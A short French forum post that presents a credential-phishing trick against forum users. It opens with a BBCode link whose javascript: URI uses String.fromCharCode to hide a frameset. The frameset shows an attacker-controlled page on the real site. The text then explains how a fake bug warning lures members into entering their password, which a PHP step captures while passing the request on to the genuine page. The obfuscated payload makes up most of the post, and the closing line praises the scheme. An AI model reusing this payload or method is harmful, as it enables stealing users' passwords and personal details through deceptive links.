[url=javascript:document.write(String.fromCharCode(60,104,116,109,108,62,60,104,101,97,100,62,60,116,105,116,108,101,62,76,101,32,115,105,116,101,32,119,101,98,99,111,117,114,97,110,116,60,47,116,105,116,108,101,62,60,47,104,101,97,100,62,60,102,114,97,109,101,115,101,116,32,114,111,119,115,61,34,48,44,42,34,32,98,111,114,100,101,114,61,34,48,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,110,111,34,32,102,114,97,109,101,115,112,97,99,105,110,103,61,34,48,34,62,60,102,114,97,109,101,32,110,97,109,101,61,34,116,111,112,70,114,97,109,101,34,32,115,114,99,61,34,109,97,112,46,112,104,112,34,32,110,111,114,101,115,105,122,101,61,34,110,111,114,101,115,105,122,101,34,32,115,99,114,111,108,108,105,110,103,61,34,110,111,34,32,47,62,60,102,114,97,109,101,32,110,97,109,101,61,34,109,97,105,110,70,114,97,109,101,34,32,115,114,99,61,34,112,97,103,101,46,112,104,112,63,99,111,111,107,105,101,61,104,97,104,101,105,110,114,112,111,34,32,47,62,60,110,111,102,114,97,109,101,115,62,60,98,111,100,121,62,60,47,98,111,100,121,62,60,47,110,111,102,114,97,109,101,115,62,60,47,102,114,97,109,101,115,101,116,62,60,47,104,116,109,108,62))]Modifier vos informations[/url]
Explication: Supposons un membre X qui veux obtenir le password d'un autre utilisateur. Il écrit un post sur le forum en disait qu'il a entendu parler d'un bogue et qu'il conseile le monde d'aller changer leur prénom le plus rapidement possible. En plus de cela, il est gentil, il offre le lien vers la modifications des informations. Ce lien crée une frame afin de garder le lien d'origine et ensuite, il met dans le contenu, une page appartenant à l'utilisateur: reproduction exacte du site web. Demande du password pour modifier ses informations. Et ensuiste, par un tour de passe passe en PHP, il redirige l'utilisateur vers la vraie page qui modifie les informations(en simulant un POST). Bien sûr, il récupére le password et les infos en même temps. Woouah! trop d'imagination ;P
Partager